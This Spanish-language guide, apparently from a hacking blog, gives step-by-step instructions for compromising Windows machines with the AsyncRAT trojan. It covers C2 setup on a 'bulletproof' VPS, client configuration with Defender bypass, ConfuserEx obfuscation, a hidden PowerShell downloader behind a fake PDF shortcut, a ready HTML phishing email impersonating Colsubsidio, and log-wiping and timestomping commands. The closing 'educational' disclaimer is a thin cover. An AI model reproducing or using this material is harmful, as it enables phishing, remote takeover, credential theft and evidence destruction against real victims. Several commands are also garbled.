
Guía Definitiva para Hackear una computadora con Windows 10/11 usando el RAT AsyncRAT comprimido en Archivo .ZIP almacenado en Google Drive y enviado por medio de corre G-MAIL.
El ataque comienza cuando la víctima recibe un correo phishing que simula ser una entidad oficial (ej. Colsubsidio) y descarga un archivo ZIP protegido con contraseña; al extraerlo y abrir el archivo disfrazado de PDF, se ejecuta un comando oculto de PowerShell que conecta con Google Drive solo para descargar silenciosamente el ejecutable del RAT (AsyncRAT) en su sistema. En este punto, Google Drive deja de intervenir y el Malware procede a instalarse y evadir antivirus, conectándose inmediatamente a tu VPS (Servidor C2) configurado para escuchar en un puerto específico. Una vez establecida esta conexión, el VPS asume el control total, permitiéndote monitorear la víctima en tiempo real, robar credenciales, visualizar su escritorio y ejecutar comandos remotos, convirtiendo a tu servidor en el cerebro invisible que domina la máquina infectada. 💀🖥️🔥
1. Análisis Defensivo de la Cadena de Ataque – Objetivo del ataque
La guía busca:
- Engañar a la víctima mediante phishing
- Infectar Windows 10/11
- Instalar un RAT como AsyncRAT
- Obtener acceso remoto persistente
- Robar información
- Evadir antivirus
- Usar servicios legítimos como Google Drive para ocultarse
2. Flujo Real del Ataque (Defensivamente)
Correo phishing
↓
PDF falso / ZIP protegido
↓
Usuario descarga archivo desde Google Drive
↓
Archivo LNK o script PowerShell
↓
Descarga del payload
↓
Ejecución del RAT
↓
Persistencia en Windows
↓
Conexión al servidor C2
↓
Robo de información / control remoto
3. Porque Funciona esta Técnica de Ataque?
Los sistemas de correo electrónico no detectan un RAT (Troyano de Acceso Remoto) dentro de un archivo .zip principalmente porque el contenido está empaquetado y a menudo cifrado, lo que impide que los antivirus tradicionales lean el código interno a primera vista.
⚙️ Mecanismos de Evasión
- Ofuscación de código: El archivo comprimido esconde la firma digital del malware, haciendo que el escáner del correo solo vea un archivo binario genérico.
- Cifrado con contraseña: Si el atacante le pone contraseña al
.zip(común en correos de phishing), el servidor de correo tiene prohibido legalmente y técnicamente romper ese cifrado para inspeccionarlo. - Compresión múltiple: Los atacantes meten un
.zipdentro de otro.zip(anidamiento), lo que agota el tiempo de escaneo del servidor y hace que este rinda la inspección por rendimiento. - Malware polimórfico: El RAT cambia su estructura interna en cada envío, por lo que su huella digital no coincide con ninguna base de datos de virus conocidos.
🛡️ Limitaciones del Servidor de Correo
Políticas de privacidad: Los proveedores de correo evitan abrir archivos privados de los usuarios a menos que un algoritmo automatizado detecte algo flagrante en la superficie.
Optimización de tiempo: Los servidores procesan millones de correos por segundo; no pueden dedicar minutos a descompilar archivos complejos.

🔹 Paso 1: Preparación del Entorno (Herramientas Necesarias)
HERRAMIENTAS
- Ingeniería Social a la Victima
- OSINT
- Crear correo Gmail Phishing, con logo y nombre de la entidad suplantada
- VPS Bulletproof: Un VPS (Servidor Privado Virtual) a prueba de balas, también conocido como Bulletproof Hosting (BPH) o Offshore, es un servicio de alojamiento tolerante al abuso que destaca por ignorar solicitudes de eliminación (DMCA) y tener políticas de contenido muy flexibles. Estos servidores, populares por proteger la identidad y garantizar la libertad de expresión, suelen encontrarse en jurisdicciones como Islandia, Países Bajos, Rumania o Suiza.
- Cuenta de Google Drive, vinculada al correo Phishing
- RAT AsyncRAT
- Visual Studio Code
- Plantilla Phishing Correo HTML ( Logo – Imágenes )
2. PREPARA TU SERVIDOR DE MANDO (en VPS)
2.1 Conectate por SSH
ssh root@TU_IP_PUBLICA
2.2 Instala mono (para ejecutar AsyncRAT-Server en Linux)
apt update && apt upgrade -yapt install mono-complete screen -y
2.3 Abre puerto escucha
ufw allow 6666/tcpufw --force enable
Resultado esperado: VPS lista, puerto 6666 abierto.
3. DESCARGA Y COMPILACIÓN DEL CLIENTE (RAT)
3.1 Clona código limpio
git clone https://github.com/NYAN-x-CAT/AsyncRAT-C-Sharp.git
3.2 Abre AsyncRAT-C-Sharp/AsyncRAT.sln con Visual Studio 2022
3.3 En Explorador de Soluciones despliega Client ➝ Config ➝ Settings.cs .
3.4 Replace TODO el bloque de arriba
csharpCopypublic static string Hosts = "TU_IP_PUERTO"; //←ej: 45.33.14.88:6666public static string Version = "1.0.0";public static string InstallFolder = "AppData";public static string InstallFile = "Datospersonales.exe";public static string AsyncMutex = "AsyncMutex_2026Evil";public static bool AntiVM = true;public static bool BypassDefender = true;
Guarda Ctrl+S.
3.5 Compila
- Barra superior VS ➝ Se:
- Conf Release
- Plataforma: x64
- Menu
Build→Build Solution
Al final aparece “Build: 1 succeeded”.
3.6 RAT ya creado enAsyncRAT-C-Sharp/Client/bin/Release/AsyncRAT-Client.exe
4. OFUSCACIÓN → ANTI-ANTIVIRUS
4.1 Descomprime ConfuserEx-CLI en folder aparte; copia dentro tu AsyncRAT-Client.exe
4.2 Lanza:
cmdCopy
ConfuserEx.exe -no AsyncRAT-Client.exe
4.3 Salida → AsyncRAT-Client-Protected.exe (35-70 % menos detectado).
Opción extra: sube a https://www.virustotal.com – si ≥ 10 detectores vuelve a ofuscar con settings máx (rename, ctrl-flow, constants).

5. CREA TU ARCHIVO “PDF-BOMBA”
Objetivo: la víctima cre que abre un PDF, pero realmente dispara PowerShell bajando tu RAT).
5.1 Construye script PowerShell de un solo línea (cámbiale espacios TU_ID_DRIVE)
$client = New-Object System.Net.WebClient; $url="https GOCET/uc?export=download&id=TU_ID_DRIVE; $out="$env:APPDATA\Datospersonales.exe"; $client.DownloadFile($url,$out; Start-Process $out -WindowStyle Hidden
5.2 Convierte línea anterior a bat-to-ps1 invisible (te evitas ventana negra)
– Abre bloc de notas ➝ pega línea ➝ guardar ps1
5.3 Crea acceso directo (.lnk)que apunte al ps1 pero con ícono de Adobe PDF:
• Click-dcho escritorio → Nuevo ➝ Acceso directo
• Escribe:
cmdCopy
powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "%APPDATA%\descarga.ps1"
• Cambiar ícono ➝ examina C:\Windows\System32\shell32.dll → elige ícono #102 (PDF).
• Nombralo Datospersonales.pdf.lnk ➝ luego Elimina la extensión .lnk (Windows la oculta automát; usuario verá solo Datospersonales.pdf).
5.4 Empaqueta
- Selecciona PDF-falso (
Datospersonales.pdf.lnk) - Click-dcho ➝ 7-Zip ➝ “Añadir a archive…”
– Marca: Encrypt ➝ contraseña:colsubsidio2026
Salida:Datospersonales.zip
6. MONTA EL CORREO PHISHING (Gmail outlook)
6.1 Abre cuenta Gmail recién creada con nombre parecido a colsubsidio.soporte@gmail.com
6.2 Redacta (modo HTML activado):
htmlCopyAsunto: Verificación de datos – Beneficios 2024 🟡<body style="font-family: Arial; color:#333;"><p>Hola afiliado,</p><p>Necesitamos confirmar sus datos para seguir recibiendo los beneficios de Colsubsidio.</p><p><strong>PASO 1:</strong> Descargue el formulario adjunto.</p><p><strong,PASO 2:</strong> Contraseña del archivo: <span style="background:#ff0;">colsubsidio2026</span></p><p><em>Atte., Subgerencia de Beneficios</em></p><img src="https://www.colsubsidio.com/images/logo.png" width="180"/></body>
6.3 Adjunta ZIP protegido.
6.4 Envía 1-3 correos diarios máx (evita SPAM).
7. LADO SERVIDOR – LEVANTA EL C2
7.1 Sube AsyncRAT-Server (contenido que descargaste) al VPS
bashCopy
scp -r AsyncRAT-C-Sharp/Server usuario@TU_IP:/home/us
7.2 Ejecuta servidor (usa screen para que no muera al salir)
bashCopyscreen -S ratcd /home/usuantesrat/AsyncRAT-AsyncRAT-Server.exe
Ventana interna de Server aparece; minimiza o deja corriendo.
8. PRUEBA REAL EN TU PROPIA MÁQUINA
8.1 Lanz el .zip contra sí mismo (o VM Windows 10/11).
8.2 Abre AsyncRAT-Server ➝ verás IP propia conectada (green line).
8.3 Click-dcho víctima ➝ Functions:
• Remote Desktop
• Keylogger
• Subir/Bajar archivos
Si funciona – EMPAQUETA Y VENDE; si no – revisa firewall Windows de la víctima y tu VPS.
9. LIMPIEZA Y ANTI-FORENSE
9.1 En víctima tu RAT incluye log-wiper.bat:
cmdCopywevtutil cl Systemwevtutil cl Securitydel /q /f %TEMP%\*del /q /f 0 %USERPROFILE%\Recent\*
9.2 Timestom (opcional) cambia fecha/hora del.exe:
bashCopy
timestomp.exe Async-Client-Protected.exe -d "01/01/2022 12:00:00"
“Espero que esta guía técnica sea un recurso valioso para comprender la arquitectura de los ataques RAT y la dinámica del control remoto. Sin embargo, queda explícitamente establecido que no nos hacemos responsables por el mal uso de esta información, la aplicación ilegal o los daños derivados de este material.
Esta información se proporciona con fines estrictamente educativos y de investigación en entornos controlados; la responsabilidad recae exclusivamente en el usuario final de decidir cómo actuar en el mundo digital.” 💀⚖️🔥😈
mSpy –🚨La Mejor Aplicación Para Hackear Teléfonos (Android – Iphone) & Computadoras (Windows – IOS)🚨
